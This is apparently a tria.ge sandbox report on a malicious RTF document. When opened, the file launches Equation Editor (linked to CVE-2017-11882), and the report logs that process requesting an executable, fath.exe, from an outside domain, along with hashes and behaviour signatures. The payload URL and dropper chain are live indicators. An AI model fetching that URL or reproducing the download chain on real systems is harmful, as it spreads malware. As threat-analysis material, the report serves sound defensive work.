Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    14/05/2024, 06:48 UTC

General

  • Target

    409239eded911637708f859255dc90c8_JaffaCakes118.rtf

  • Size

    19KB

  • MD5

    409239eded911637708f859255dc90c8

  • SHA1

    96d1950509af3a9a94f0a9d8a16bc0284e3149f6

  • SHA256

    11ce880de1396d1d50a1240288fdc0273b7a2cd49ce6012b4f759b8831fb7e8b

  • SHA512

    03d9eea789b2392337a3fa7149de4c4e2a7c7e64929906c581525dac33690bcd61fc42de27445d3ba844eee6bab7044c9587c1540b6bd92f3c16a9db753a3efb

  • SSDEEP

    384:vHxcWi1mN0xJSA/2TjYz9G6UGFY/d7nBAWEml5IaWKDZax1:ZcLMN0xQA/2TjYzESFY/d7ltl5dWKDZQ

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\409239eded911637708f859255dc90c8_JaffaCakes118.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1640
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      PID:3012

    Network

    • flag-us
      DNS
      hwy11-17-hwy582tocoughlin.com
      EQNEDT32.EXE
      Remote address:
      8.8.8.8:53
      Request
      hwy11-17-hwy582tocoughlin.com
      IN A
      Response
      hwy11-17-hwy582tocoughlin.com
      IN A
      66.96.160.130
    • flag-us
      GET
      http://hwy11-17-hwy582tocoughlin.com/wp-includes/images/file/fath.exe
      EQNEDT32.EXE
      Remote address:
      66.96.160.130:80
      Request
      GET /wp-includes/images/file/fath.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: hwy11-17-hwy582tocoughlin.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Tue, 14 May 2024 06:48:30 GMT
      Content-Type: text/html; charset=iso-8859-1
      Content-Length: 278
      Connection: keep-alive
      Server: Apache
      Location: https://hwy11-17-hwy582tocoughlin.com/wp-includes/images/file/fath.exe
      Cache-Control: max-age=3600
      Expires: Tue, 14 May 2024 07:48:30 GMT
      Age: 0
    • flag-us
      GET
      https://hwy11-17-hwy582tocoughlin.com/wp-includes/images/file/fath.exe
      EQNEDT32.EXE
      Remote address:
      66.96.160.130:443
      Request
      GET /wp-includes/images/file/fath.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Connection: Keep-Alive
      Host: hwy11-17-hwy582tocoughlin.com
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 14 May 2024 06:48:34 GMT
      Content-Type: text/html; charset=UTF-8
      Content-Length: 9136
      Connection: keep-alive
      Server: Apache
      X-Powered-By: PHP/7.4.10
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      Link: <https://hwy11-17-hwy582tocoughlin.com/wp-json/>; rel="https://api.w.org/"
      Content-Encoding: gzip
      Vary: Accept-Encoding
      Age: 3
    • 66.96.160.130:80
      http://hwy11-17-hwy582tocoughlin.com/wp-includes/images/file/fath.exe
      http
      EQNEDT32.EXE
      590 B
      746 B
      5
      3

      HTTP Request

      GET http://hwy11-17-hwy582tocoughlin.com/wp-includes/images/file/fath.exe

      HTTP Response

      301
    • 66.96.160.130:443
      https://hwy11-17-hwy582tocoughlin.com/wp-includes/images/file/fath.exe
      tls, http
      EQNEDT32.EXE
      1.3kB
      13.1kB
      13
      17

      HTTP Request

      GET https://hwy11-17-hwy582tocoughlin.com/wp-includes/images/file/fath.exe

      HTTP Response

      404
    • 8.8.8.8:53
      hwy11-17-hwy582tocoughlin.com
      dns
      EQNEDT32.EXE
      75 B
      91 B
      1
      1

      DNS Request

      hwy11-17-hwy582tocoughlin.com

      DNS Response

      66.96.160.130

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      09e67772bb243efdf9c9cc157782ab8e

      SHA1

      09d103eb237e9889f7e049be8a39d2efc4e2d53f

      SHA256

      51827371742f5140c2eef424a39b8011e87e925999c2b2859eaa722c433901f3

      SHA512

      af14a65f53b1462e44b0c9a3b47be3f2da3c74345bfbfcb30ed8912e04c57bb2614c6ac74f6ca676d63fc49969854f333619f8a3269c2ff5b109636de917aec7

    • memory/2256-0-0x000000002F541000-0x000000002F542000-memory.dmp

      Filesize

      4KB

    • memory/2256-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2256-2-0x000000007101D000-0x0000000071028000-memory.dmp

      Filesize

      44KB

    • memory/2256-27-0x000000007101D000-0x0000000071028000-memory.dmp

      Filesize

      44KB

    • memory/2256-45-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.